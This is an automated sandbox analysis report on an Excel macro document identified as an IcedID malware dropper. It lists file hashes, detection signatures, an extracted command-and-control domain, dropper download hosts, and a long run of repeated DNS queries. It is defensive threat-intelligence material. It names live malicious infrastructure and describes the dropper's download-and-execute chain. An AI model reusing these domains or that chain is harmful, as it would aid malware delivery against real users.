Analysis Report document-1251000362.xlsm

Overview

General Information

Sample Name: document-1251000362.xlsm
Analysis ID: 382871
MD5: 09217c79f99bbfe977a80d83d62489c7
SHA1: da600d355dfb57190a5745342f3cfeb7d1e509f1
SHA256: 7bf8049e4766a2985851a3d3bf01710c53c389fe1e54397fa332672b62b649d8
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Outdated Microsoft Office dropper detected
Performs DNS queries to domains with low reputation
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses insecure TLS / SSL version for HTTPS connection

Classification

AV Detection:

barindex
Found malware configuration
Source: 3.2.rundll32.exe.190000.0.raw.unpack Malware Configuration Extractor: IcedID {"C2 url": "usaaforced.fun"}
Multi AV Scanner detection for submitted file
Source: document-1251000362.xlsm Metadefender: Detection: 13% Perma Link
Yara detected IcedID
Source: Yara match File source: 00000003.00000002.2497781112.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2174963879.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172023641.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173003375.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2497738687.00000000002E1000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173701556.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172513544.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2796, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2540, type: MEMORY

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49170 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 3003[1].gif.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: metaflip.io
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.185.48.186:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.185.48.186:443

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: usaaforced.fun
Outdated Microsoft Office dropper detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE DNS query: agenbolatermurah.com is down
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE DNS query: agenbolatermurah.com is down
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE DNS query: agenbolatermurah.com is down
Performs DNS queries to domains with low reputation
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
